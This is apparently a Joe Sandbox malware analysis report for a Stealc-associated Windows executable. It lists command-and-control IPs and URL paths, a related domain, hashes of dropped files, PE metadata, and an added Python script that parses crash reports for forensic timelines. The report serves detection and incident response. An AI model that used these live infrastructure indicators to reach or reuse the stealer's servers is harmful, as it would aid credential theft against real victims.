• Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: GK059kPZ5B.exe
Simulations (Behavior and APIs)
Time        Type               Description
13:08:32    API Interceptor    8739886x Sleep call for process: GK059kPZ5B.exe modified
13:10:03    API Interceptor    1x Sleep call for process: WerFault.exe modified
Joe Sandbox View / Context

IPs
Match: 176.113.115.37
  Associated sample   Detection   Threat name     Context
  jicQJ2cdlM.exe      malicious   Stealc          176.113.115.37/ScreenUpdateSync.exe
  w12rykWq2L.exe      malicious   Stealc          176.113.115.37/ScreenUpdateSync.exe
  jWpgP22dl2.exe      malicious   Stealc          176.113.115.37/ScreenUpdateSync.exe
  mCe4hBfqCT.exe      malicious   Stealc          176.113.115.37/ScreenUpdateSync.exe
  BKoQ3DF8eD.exe      malicious   Stealc          176.113.115.37/ScreenUpdateSync.exe
  v2hvYA53Ys.exe      malicious   Stealc          176.113.115.37/ScreenUpdateSync.exe
  Zl5QaBwsTJ.exe      malicious   Stealc          176.113.115.37/ScreenUpdateSync.exe
  sgM0Akbldk.exe      malicious   Stealc          176.113.115.37/ScreenUpdateSync.exe
  VAIIBIHmtT.exe      malicious   Stealc          176.113.115.37/ScreenUpdateSync.exe
  CHHE6LLjWx.exe      malicious   Stealc, Vidar   176.113.115.37/ScreenUpdateSync.exe
Match: 62.204.41.177
  Associated sample                                    Detection   Threat name   Context
  1vYjXDbKHt.exe                                       malicious   Stealc        62.204.41.177/edd20096ecef326d.php
  716b3c89802c1713871667444720e62f3fc064c9910a1.exe    malicious   Stealc        62.204.41.177/edd20096ecef326d.php
  oqIz1tfl5h.exe                                       malicious   Stealc        62.204.41.177/edd20096ecef326d.php
  jicQJ2cdlM.exe                                       malicious   Stealc        62.204.41.177/edd20096ecef326d.php
  c4da1217278a52b300055859db330a4a3dca4ad09fe56.exe    malicious   Stealc        62.204.41.177/edd20096ecef326d.php
  w12rykWq2L.exe                                       malicious   Stealc        62.204.41.177/edd20096ecef326d.php
  jWpgP22dl2.exe                                       malicious   Stealc        62.204.41.177/edd20096ecef326d.php
  mCe4hBfqCT.exe                                       malicious   Stealc        62.204.41.177/edd20096ecef326d.php
  Ondso1o6Yz.exe                                       malicious   Stealc        62.204.41.177/edd20096ecef326d.php
  BKoQ3DF8eD.exe                                       malicious   Stealc        62.204.41.177/edd20096ecef326d.php
Domains
Match: post-to-me.com
  Associated sample   Detection   Threat name     Context
  jicQJ2cdlM.exe      malicious   Stealc          104.21.56.70
  w12rykWq2L.exe      malicious   Stealc          172.67.179.207
  jWpgP22dl2.exe      malicious   Stealc          104.21.56.70
  mCe4hBfqCT.exe      malicious   Stealc          104.21.56.70
  BKoQ3DF8eD.exe      malicious   Stealc          104.21.56.70
  v2hvYA53Ys.exe      malicious   Stealc          104.21.56.70
  Zl5QaBwsTJ.exe      malicious   Stealc          104.21.56.70
  sgM0Akbldk.exe      malicious   Stealc          172.67.179.207
  VAIIBIHmtT.exe      malicious   Stealc          104.21.56.70
  CHHE6LLjWx.exe      malicious   Stealc, Vidar   172.67.179.207
ASNs
Match: SELECTEL, RU
  Associated sample   Detection   Threat name   Context
  jicQJ2cdlM.exe      malicious   Stealc        176.113.115.37
  w12rykWq2L.exe      malicious   Stealc        176.113.115.37
  jWpgP22dl2.exe      malicious   Stealc        176.113.115.37
  mCe4hBfqCT.exe      malicious   Stealc        176.113.115.37
  BKoQ3DF8eD.exe      malicious   Stealc        176.113.115.37
  v2hvYA53Ys.exe      malicious   Stealc        176.113.115.37
  Zl5QaBwsTJ.exe      malicious   Stealc        176.113.115.37
  sgM0Akbldk.exe      malicious   Stealc        176.113.115.37
  VAIIBIHmtT.exe      malicious   Stealc        176.113.115.37
  la.bot.sh4.elf      malicious   Unknown       92.53.102.17
Match: TNNET-AS TNNet Oy Main network, FI
  Associated sample                                    Detection   Threat name   Context
  1vYjXDbKHt.exe                                       malicious   Stealc        62.204.41.177
  716b3c89802c1713871667444720e62f3fc064c9910a1.exe    malicious   Stealc        62.204.41.177
  oqIz1tfl5h.exe                                       malicious   Stealc        62.204.41.177
  jicQJ2cdlM.exe                                       malicious   Stealc        62.204.41.177
  c4da1217278a52b300055859db330a4a3dca4ad09fe56.exe    malicious   Stealc        62.204.41.177
  w12rykWq2L.exe                                       malicious   Stealc        62.204.41.177
  jWpgP22dl2.exe                                       malicious   Stealc        62.204.41.177
  mCe4hBfqCT.exe                                       malicious   Stealc        62.204.41.177
  Ondso1o6Yz.exe                                       malicious   Stealc        62.204.41.177
  BKoQ3DF8eD.exe                                       malicious   Stealc        62.204.41.177
Match: CLOUDFLARENET, US
  Associated sample / URL                                                                      Detection   Threat name                               Context
  ZnPyVAOUBc.exe                                                                               malicious   LummaC, Amadey, LummaC Stealer, Stealc    188.114.96.3
  jicQJ2cdlM.exe                                                                               malicious   Stealc                                    104.21.56.70
  http://cio.krqe.com/gtdhffgjghfj3081868fB16927453Xe78849729yB17367Xb25vBr206268IG            malicious   Unknown                                   172.67.189.243
  http://cio.krqe.com/gtdhffgjghfj3081868fB16927453Xe78849729yB17367Xb25vBr206268IG            malicious   Unknown                                   172.67.189.243
  Setup.exe                                                                                    malicious   LummaC                                    188.114.97.3
  Setup.exe                                                                                    malicious   LummaC                                    188.114.97.3
  file.exe                                                                                     malicious   LummaC, Amadey, LummaC Stealer, Stealc    104.21.95.91
  file.exe                                                                                     malicious   LummaC                                    172.67.170.64
  file.exe                                                                                     malicious   LummaC, Amadey, LummaC Stealer, Stealc    104.21.95.91
  w12rykWq2L.exe                                                                               malicious   Stealc                                    172.67.179.207
JA3 Fingerprints
Match: 37f463bf4616ecd445d4a1937da06e19
  Associated sample                                         Detection   Threat name         Context
  jicQJ2cdlM.exe                                            malicious   Stealc              172.67.179.207
  ae67deafb5d9386fbca3d4d728d79651daaa42eef8086.exe         malicious   Stealc, Vidar       172.67.179.207
  w12rykWq2L.exe                                            malicious   Stealc              172.67.179.207
  jWpgP22dl2.exe                                            malicious   Stealc              172.67.179.207
  1GeaC4QnFy.dll                                            malicious   CobaltStrike        172.67.179.207
  OyPpyRRqd8.dll                                            malicious   CobaltStrike        172.67.179.207
  mCe4hBfqCT.exe                                            malicious   Stealc              172.67.179.207
  H33UCslPzv.exe                                            malicious   XWorm               172.67.179.207
  factura Fvsae2400398241025.pdf.exe                        malicious   FormBook, GuLoader  172.67.179.207
  SecuriteInfo.com.Program.Unwanted.5510.8307.25058.exe     malicious   Unknown             172.67.179.207

Dropped Files
No context

Created / Dropped Files
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.9644098237750152
Encrypted: false
SSDEEP: 192:21369V0kVVShjMhZrMZtzuiFCZ24IO8p:I692kVVShjjTzuiFCY4IO8p
MD5: C787DC7CB04E2F06E1B23FFAC60519B8
SHA1: 58E1065D21F5E8B423FEF14EAFC7AA320ABE8536
SHA-256: BEEC38894E806605384805C011C7143EFA250A2151E4367455584530F7AAA3CC
SHA-512: 211B63C1ABD5CE821C12A057307CBAA61F0C38D95BBB405428926240699CE9C946D0F1D84E88B8B106F807926C9A8A6D4DFBA70B87B16359AFE0A89D343984DC
Malicious: false
Reputation: low
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.4.3.6.1.2.2.0.1.5.8.9.0.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.4.3.6.1.2.2.5.0.0.2.5.8.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.c.6.5.6.f.3.8.-.0.a.7.f.-.4.b.e.7.-.8.8.5.a.-.0.7.0.d.d.b.1.0.3.7.f.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.c.8.b.1.1.6.2.-.5.e.5.8.-.4.8.0.8.-.a.5.c.9.-.6.7.9.0.2.a.2.e.0.8.9.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.A.8.6.5...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.3.8.-.0.0.0.1.-.0.0.1.4.-.1.a.d.a.-.c.7.b.0.c.9.2.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.f.7.6.e.a.9.a.e.a.9.9.3.4.9.a.7.5.3.b.7.b.6.2.e.b.5.9.e.6.c.0.0.0.0.f.f.f.f.!.0.0.0.0.7.5.f.7.b.1.8.9.5.b.d.9.7.b.6.c.f.c.b.9.a.a.0.c.5.e.8.3.d.e.9.f.b.4.2.4.c.b.b.0.!.A.8.6.5...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.
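The UTF-16 preview above is a Windows Error Reporting Report.wer written when the dropped A865.tmp.exe crashed under WerFault.exe. Such reports are useful forensic evidence because they record the crashing image name, a FILETIME, and a TargetAppId whose middle segment is conventionally read in DFIR as the SHA-1 of the crashed file. The following example is added here (not Joe Sandbox code): it parses a Report.wer from bytes, converts EventTime to UTC, and extracts the name and hash from TargetAppId. The sample file is constructed from the values visible in the preview; the SHA-1 interpretation of TargetAppId is an assumption to confirm against the dropped file's own hash, which this page does not list.

```python
import re
from datetime import datetime, timedelta, timezone


def parse_wer_report(data: bytes) -> dict:
    """Parse a Report.wer (UTF-16 with BOM, CRLF, key=value lines) into a dict."""
    if data.startswith(b"\xff\xfe"):
        text = data[2:].decode("utf-16-le")
    elif data.startswith(b"\xfe\xff"):
        text = data[2:].decode("utf-16-be")
    else:                      # WER writes a BOM; tolerate its absence
        text = data.decode("utf-16-le")
    fields = {}
    for line in text.splitlines():
        if "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields


def filetime_to_utc(filetime: int) -> str:
    """Convert a Windows FILETIME (100 ns ticks since 1601-01-01) to ISO-8601 UTC."""
    epoch = datetime(1601, 1, 1, tzinfo=timezone.utc)
    when = epoch + timedelta(microseconds=filetime // 10)
    return when.replace(microsecond=0).isoformat()


# TargetAppId layout: "W:<app-id hash>!0000<40 hex>!<image name>".
_TARGET_RE = re.compile(r"^W:[0-9a-f]+!0000([0-9a-f]{40})!(.+)$", re.IGNORECASE)


def crashed_binary(fields: dict):
    """Return (image name, sha1) from TargetAppId. Assumption: the 40 hex
    digits after '!0000' are the SHA-1 of the crashed executable, the usual
    DFIR reading; verify against the file hash before relying on it."""
    m = _TARGET_RE.match(fields.get("TargetAppId", ""))
    if not m:
        return fields.get("NsAppName"), None
    return m.group(2), m.group(1).lower()


# Constructed Report.wer, rebuilt from the values visible in the preview.
SAMPLE_REPORT_WER = ("\ufeff" + "\r\n".join([
    "Version=1",
    "EventType=APPCRASH",
    "EventTime=133744361220158907",
    "ReportType=2",
    "Consent=1",
    "ReportIdentifier=fc656f38-0a7f-4be7-885a-070ddb1037fe",
    "NsAppName=A865.tmp.exe",
    "AppSessionGuid=00000e38-0001-0014-1ada-c7b0c927db01",
    "TargetAppId=W:0006b9f76ea9aea99349a753b7b62eb59e6c0000ffff"
    "!000075f7b1895bd97b6cfcb9aa0c5e83de9fb424cbb0!A865.tmp.exe",
    "",
])).encode("utf-16-le")


if __name__ == "__main__":
    report = parse_wer_report(SAMPLE_REPORT_WER)
    print(report["EventType"], report["NsAppName"])
    print("crashed at", filetime_to_utc(int(report["EventTime"])))
    print("image, sha1:", crashed_binary(report))
```

The converted EventTime lands at 17:08:42 UTC, which matches the minidump timestamp shown for the next dropped file and sits about a minute after the analysis start time, so the crash of A865.tmp.exe can be placed precisely on the sandbox timeline.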
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 14 streams, Sat Oct 26 17:08:42 2024, 0x1205a4 type
Category: dropped
Size (bytes): 60844
Entropy (8bit): 1.928410118636886
Encrypted: false
SSDEEP: 192:yqV4X+9o6KHZXWxOEOJwwereqAQb9NojnWVq+3XlpKKI0NBQMib6gZnHxoDrs:XhoxnEExeqqAQZajaSKI6piGghi0
MD5: AF3C88766784E6E16F8019610B9B9D49
SHA1: 6FD33C3B61336456F3D312313AD4363685E93A9B
SHA-256: 45731058F1010583A4C47F7671E7D24E27424AB94AF7D190FFD9FEF5CB8AD296
SHA-512: 01F68B86B03B39A5FC725112B04659041FE289D3186695173C3EC50460E571FE13D58A359E99D2324196B5FFF50D9542C8B8784A6377E5FDBA9A9729070F53D3
Malicious: false
Reputation: low
                                                          Preview:MDMP..a..... ........".g............4...............<............*..........T.......8...........T............3..........................................................................................................eJ......H.......GenuineIntel............T.......8....".g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 8308
Entropy (8bit): 3.6977825699850184
Encrypted: false
SSDEEP: 192:R6l7wVeJ1v6Znb6Y7M6sWgmf3CcpDy89bzisf9xm:R6lXJd6Znb6YQ6lgmf3C6zhfi
MD5: 0036F2EF58FB748215A332761743963B
SHA1: 33A81E09733FD5A87EDDD76EC1680604005F8B62
SHA-256: C448F8F0E1754585816BD6BF0674F2F1032047194E399344FD1870A221C74B3D
SHA-512: D18396047E60D8D0B9D843C1306E0EB427757348F01C1F99CB54F6D1E4F5ABBAD3A1E0C584F688350262F19497D0C616061D80F5AA775B0B005FF7315CCCF372
Malicious: false
Reputation: low
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.6.4.0.<./.P.i.
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4565
                                                          Entropy (8bit):4.43801263051237
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwWl8zspJg77aI90CyWpW8VYVpYm8M4Jh8Fn+q8y0Bd+Zrd:uIjf7I7ue7Vk4JY02Zrd
                                                          MD5:B77B1F27ABF54CEA629555FE36D9918D
                                                          SHA1:5397489E42EC7F354110EB955586863EF59677F7
                                                          SHA-256:1016CAE3CFB9162EEAB4D9F6415289AFECDC798D019A69875CDDF9130AAD08AC
                                                          SHA-512:09456D8AD0E791BBF580A20DC7477BF8EAEC24D3F536F5CF3013DE99A223B328E31D479A32A3909AEF42BA006E7A6ED91B6C7588A04D5FBD88AA5C2512EDEBE8
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="560651" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                          Process:C:\Users\user\Desktop\GK059kPZ5B.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):402432
                                                          Entropy (8bit):6.631084505190823
                                                          Encrypted:false
                                                          SSDEEP:6144:r62/aT+zPGv8YxsI111cAz/LslwcxJm4tEyUonhvxFo:KT+zGvxNcAPCwGJptEyUg5
                                                          MD5:8107C38AF897D81AA4BFE8CE9CA8407C
                                                          SHA1:75F7B1895BD97B6CFCB9AA0C5E83DE9FB424CBB0
                                                          SHA-256:5AC2F02DAE8B85F730B17D9D8C2CB51DFDB7046713C65AE72B0CF47E16A1C9A5
                                                          SHA-512:1B4A0DF730AE0912CF3CF18E1210644D3EA804B5F0569997284F04CEDFDAB86075C7BA41313ED83F9B998F7ACE6BBF50CBCA052849AEE73400592951B4D3992A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Reputation:low
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K......X...X...X..pX...X..bX...X..sX...X..eXd..X(].X...X...Xt..X..lX...X..rX...X..wX...XRich...X................PE..L...../f.....................8....................@...........................&.....[8..........................................<....................................................................................................................text............................... ..`.rdata...%.......&..................@..@.data...x........L..................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\GK059kPZ5B.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):402432
                                                          Entropy (8bit):6.631084505190823
                                                          Encrypted:false
                                                          SSDEEP:6144:r62/aT+zPGv8YxsI111cAz/LslwcxJm4tEyUonhvxFo:KT+zGvxNcAPCwGJptEyUg5
                                                          MD5:8107C38AF897D81AA4BFE8CE9CA8407C
                                                          SHA1:75F7B1895BD97B6CFCB9AA0C5E83DE9FB424CBB0
                                                          SHA-256:5AC2F02DAE8B85F730B17D9D8C2CB51DFDB7046713C65AE72B0CF47E16A1C9A5
                                                          SHA-512:1B4A0DF730AE0912CF3CF18E1210644D3EA804B5F0569997284F04CEDFDAB86075C7BA41313ED83F9B998F7ACE6BBF50CBCA052849AEE73400592951B4D3992A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Reputation:low
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K......X...X...X..pX...X..bX...X..sX...X..eXd..X(].X...X...Xt..X..lX...X..rX...X..wX...XRich...X................PE..L...../f.....................8....................@...........................&.....[8..........................................<....................................................................................................................text............................... ..`.rdata...%.......&..................@..@.data...x........L..................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:MS Windows registry file, NT/2000 or above
                                                          Category:dropped
                                                          Size (bytes):1835008
                                                          Entropy (8bit):4.42149195330818
                                                          Encrypted:false
                                                          SSDEEP:6144:WSvfpi6ceLP/9skLmb0OTQWSPHaJG8nAgeMZMMhA2fX4WABlEnNA0uhiTw:1vloTQW+EZMM6DFyq03w
                                                          MD5:CCAF1E1BE758C84C2D0A77D2809C8EFE
                                                          SHA1:3ADFEC9629DC271A37045F331A3F6A315C0C7B44
                                                          SHA-256:7FBC35A627A9514A72E474FC955671A67342FC201AEC1BBF133EF54B9CE9D57E
                                                          SHA-512:174FE51BAE680B836E41A4E528A787C454F8B9AFE411E38F41E6C38D82C36EA601C0661F92F097BA179D084E271EC6DAC9A8736103F217A1935E790F2FCBD30E
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..(..'...............................................................................................................................................................................................................................................................................................................................................Y?.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):6.983658944198319
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.53%
                                                          • InstallShield setup (43055/19) 0.43%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:GK059kPZ5B.exe
                                                          File size:465'920 bytes
                                                          MD5:9883fdabd29a18139bd1cadedf550f35
                                                          SHA1:b05c71cb505793c12a728daeaf069b90ea289d6d
                                                          SHA256:2d982e9ce07d6b2d0359f388c0cc0e2ad3fc3bed3b44236ef9d442abcaf44f30
                                                          SHA512:97a8ab2a2e370fe007194776b9286ff1d068c7d4842f88ea493814d5b2efcf20e75ceb5f253a5235f71045c3264ca226b77d9c8234b9fdbacd1572891d55ed65
                                                          SSDEEP:6144:6mQ87bcIbcd8HEZXx+ltIWVnp2Y0kbQ3PdJmNoA6ZyVNp/ononRE5oCGo:hNbcd3Mt9XhsoA6/Bn
                                                          TLSH:5EA4AD1162F16912FEB767325A3B86DCD66FBC62DE38624EA1107E0F09733B1C562712
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X...9...9...9...v?..9...k-..9...k<..9...k*..9.......9...9...9...k#..9...k=..9...k8..9..Rich.9..........................PE..L..
                                                          Icon Hash:46c7c30b0f4e0d59
                                                          Entrypoint:0x4016ea
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x65B8CDCD [Tue Jan 30 10:22:05 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:0
                                                          File Version Major:5
                                                          File Version Minor:0
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:0
                                                          Import Hash:1e66c5ab7046eb4aa399af840cbcb451
                                                          Instruction
                                                          call 00007F325CE74E78h
                                                          jmp 00007F325CE7180Dh
                                                          mov edi, edi
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 00000328h
                                                          mov dword ptr [00450478h], eax
                                                          mov dword ptr [00450474h], ecx
                                                          mov dword ptr [00450470h], edx
                                                          mov dword ptr [0045046Ch], ebx
                                                          mov dword ptr [00450468h], esi
                                                          mov dword ptr [00450464h], edi
                                                          mov word ptr [00450490h], ss
                                                          mov word ptr [00450484h], cs
                                                          mov word ptr [00450460h], ds
                                                          mov word ptr [0045045Ch], es
                                                          mov word ptr [00450458h], fs
                                                          mov word ptr [00450454h], gs
                                                          pushfd
                                                          pop dword ptr [00450488h]
                                                          mov eax, dword ptr [ebp+00h]
                                                          mov dword ptr [0045047Ch], eax
                                                          mov eax, dword ptr [ebp+04h]
                                                          mov dword ptr [00450480h], eax
                                                          lea eax, dword ptr [ebp+08h]
                                                          mov dword ptr [0045048Ch], eax
                                                          mov eax, dword ptr [ebp-00000320h]
                                                          mov dword ptr [004503C8h], 00010001h
                                                          mov eax, dword ptr [00450480h]
                                                          mov dword ptr [0045037Ch], eax
                                                          mov dword ptr [00450370h], C0000409h
                                                          mov dword ptr [00450374h], 00000001h
                                                          mov eax, dword ptr [0044F004h]
                                                          mov dword ptr [ebp-00000328h], eax
                                                          mov eax, dword ptr [0044F008h]
                                                          mov dword ptr [ebp-00000324h], eax
                                                          call dword ptr [000000F0h]
                                                          Programming Language:
                                                          • [C++] VS2008 build 21022
                                                          • [ASM] VS2008 build 21022
                                                          • [ C ] VS2008 build 21022
                                                          • [IMP] VS2005 build 50727
                                                          • [RES] VS2008 build 21022
                                                          • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4db5c | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x12f000 | 0x204f8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x4d718 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x4c000 | 0x1b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x4a2a0 | 0x4a400 | f4796f0971fe2ac5e4cce90265480543 | False | 0.8783045296717171 | data | 7.663584602800402 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x4c000 | 0x2528 | 0x2600 | edc34630a03278df9e77f984746baea8 | False | 0.3763363486842105 | data | 5.450403547853696 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x4f000 | 0xdf67c | 0x4800 | 465c92e90ab6ce0d9e7b87c43a50d6a5 | False | 0.051323784722222224 | data | 0.6176250109411573 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x12f000 | 0x204f8 | 0x20600 | 7c822f30a164341ae0dcddd5f9e9f33a | False | 0.4794582528957529 | data | 5.40270524469097 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x1475e8 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.7368421052631579
RT_CURSOR | 0x147718 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.06130705394190871
RT_ICON | 0x12fac0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkish | Turkey | 0.5565031982942431
RT_ICON | 0x130968 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkish | Turkey | 0.6304151624548736
RT_ICON | 0x131210 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkish | Turkey | 0.6762672811059908
RT_ICON | 0x1318d8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkish | Turkey | 0.736271676300578
RT_ICON | 0x131e40 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Turkish | Turkey | 0.5033195020746888
